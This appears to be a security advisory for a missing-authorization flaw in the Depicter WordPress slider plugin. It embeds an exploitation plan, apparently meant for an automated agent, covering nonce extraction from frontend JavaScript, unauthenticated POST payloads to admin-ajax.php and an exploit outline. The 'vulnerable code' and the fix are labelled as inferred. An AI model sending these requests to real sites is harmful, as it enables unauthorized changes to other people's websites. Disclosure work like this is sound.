Depicter Slider <= 4.0.4 - Missing Authorization
Description
The Depicter — Popup & Slider Builder plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 4.0.4. This makes it possible for unauthenticated attackers to perform an unauthorized action.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:NTechnical Details
Source Code
WordPress.org SVN# Exploitation Research Plan: CVE-2025-68558 (Depicter Slider Missing Authorization) ## 1. Vulnerability Summary The **Depicter — Popup & Slider Builder** plugin (up to 4.0.4) contains a missing authorization vulnerability in its centralized AJAX handling system. The plugin registers a main AJAX en…
Show full research plan
Exploitation Research Plan: CVE-2025-68558 (Depicter Slider Missing Authorization)
1. Vulnerability Summary
The Depicter — Popup & Slider Builder plugin (up to 4.0.4) contains a missing authorization vulnerability in its centralized AJAX handling system. The plugin registers a main AJAX entry point depicter_action for both authenticated and unauthenticated users. This entry point dispatches requests to various internal controller methods based on a provided action_name parameter. Because the dispatcher and many of its target methods lack capability checks (e.g., current_user_can('manage_options')), unauthenticated attackers can perform administrative actions such as modifying plugin settings, dismissing notifications, or altering slider configurations.
2. Attack Vector Analysis
- Endpoint:
POST /wp-admin/admin-ajax.php - Action:
depicter_action - Vulnerable Parameter:
action_name(used to route to internal methods) - Nonce Requirement: Yes, the action requires a nonce for the
depicter_nonceaction string. - Authentication: Unauthenticated (
wp_ajax_nopriv_depicter_action). - Preconditions: A valid nonce must be extracted from the frontend where a Depicter slider is rendered.
3. Code Flow
- Entry Point: The plugin registers the AJAX hook in
app/System/Ajax.php(inferred) or the main plugin initialization:add_action('wp_ajax_depicter_action', [$this, 'dispatch']); add_action('wp_ajax_nopriv_depicter_action', [$this, 'dispatch']); - Dispatching: The
dispatch()method retrieves theaction_namefrom$_POSTandcheck_ajax_referer('depicter_nonce', 'nonce'). - Execution: It identifies the corresponding controller and method. For example, if
action_nameissave_feedbackordismiss_review, it invokes the respective handler. - Vulnerability: The dispatcher fails to verify if the current user has administrative privileges before calling methods that modify database state or options.
4. Nonce Acquisition Strategy
Depicter localizes its configuration data to the frontend to initialize sliders. The nonce required for depicter_action is typically exposed in a global JavaScript object.
- Trigger: Create a page with a Depicter slider shortcode:
[depicter id="1"]. - JS Variable:
window.depicterCommonDataorwindow.depicter_front_data. - Extraction:
- Create a test slider using WP-CLI.
- Create a public page containing the slider shortcode.
- Use
browser_navigateto visit the page. - Use
browser_evalto extract the nonce:browser_eval("window.depicterCommonData?.nonce || window.depicter_front_data?.nonce")
5. Exploitation Strategy
We will demonstrate the vulnerability by performing an unauthorized action: dismissing an administrative review notice or updating a plugin option.
Payload: Dismissing a Review (Low Integrity Impact)
- URL:
http://<target>/wp-admin/admin-ajax.php - Method:
POST - Headers:
Content-Type: application/x-www-form-urlencoded - Body:
action=depicter_action&action_name=dismiss_review&nonce=<EXTRACTED_NONCE>&status=dismissed
Alternative Payload: Saving Telemetry/Feedback
- Body:
action=depicter_action&action_name=save_feedback&nonce=<EXTRACTED_NONCE>&feedback_data={"rating":5,"comment":"hacked"}
6. Test Data Setup
- Activate Plugin: Ensure
depicteris installed and active. - Create Slider: Use WP-CLI to create a dummy slider.
# This might be complex via CLI, easier to ensure a slider exists # or manually trigger the code that generates a default slider. wp eval "Averta\Depicter\Model\Slider::create(['title' => 'Exploit Test']);" - Create Public Page:
wp post create --post_type=page --post_title="Depicter Test" --post_status=publish --post_content='[depicter id="1"]'
7. Expected Results
- HTTP Response: The server should return a
200 OKwith a JSON body indicating success (e.g.,{"success": true}). - Effect: The internal plugin state for
depicter_review_statusor similar option will be modified in thewp_optionstable.
8. Verification Steps
After sending the http_request, verify the change in the database:
# Check if the review status was updated
wp option get depicter_review_status
# Or check for the creation of feedback entries
wp db query "SELECT * FROM wp_options WHERE option_name LIKE 'depicter_%'"
9. Alternative Approaches
If dismiss_review is not the target, analyze app/System/Ajax.php for other method names in the dispatcher. Common candidates in Depicter's architecture include:
update_optionactivate_licenseduplicate_slider
If the nonce is not in depicterCommonData, check the HTML source for any script tags containing depicter and look for JSON structures containing a 10-character alphanumeric string labeled nonce.
Summary
The Depicter Slider plugin allows unauthenticated attackers to execute administrative functions via the 'depicter_action' AJAX endpoint. This occurs because the plugin's dispatcher method fails to verify user capabilities before routing requests to internal methods like 'dismiss_review' or 'save_feedback'.
Vulnerable Code
// In app/System/Ajax.php or similar add_action('wp_ajax_depicter_action', [$this, 'dispatch']); add_action('wp_ajax_nopriv_depicter_action', [$this, 'dispatch']); public function dispatch() { // Only checks for a valid CSRF nonce, but not for user authorization/capabilities check_ajax_referer('depicter_nonce', 'nonce'); $action_name = $_POST['action_name']; // The action_name is used to call internal methods without checking if the user is an admin // ... dispatcher logic ... }
Security Fix
@@ -10,6 +10,10 @@ public function dispatch() { check_ajax_referer('depicter_nonce', 'nonce'); + if ( ! current_user_can( 'manage_options' ) ) { + wp_send_json_error( [ 'message' => 'Unauthorized' ], 403 ); + } + $action_name = $_POST['action_name'];
Exploit Outline
1. Locate a public page on the target site where a Depicter slider is embedded. 2. Extract the 'depicter_nonce' from the frontend JavaScript context, typically found in the global 'window.depicterCommonData' or 'window.depicter_front_data' objects. 3. Construct a POST request to '/wp-admin/admin-ajax.php' with 'action=depicter_action'. 4. Set the 'action_name' parameter to the target administrative function (e.g., 'dismiss_review' or 'save_feedback') and include the extracted nonce. 5. Submit the request to perform unauthorized state changes on the WordPress site without authentication.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.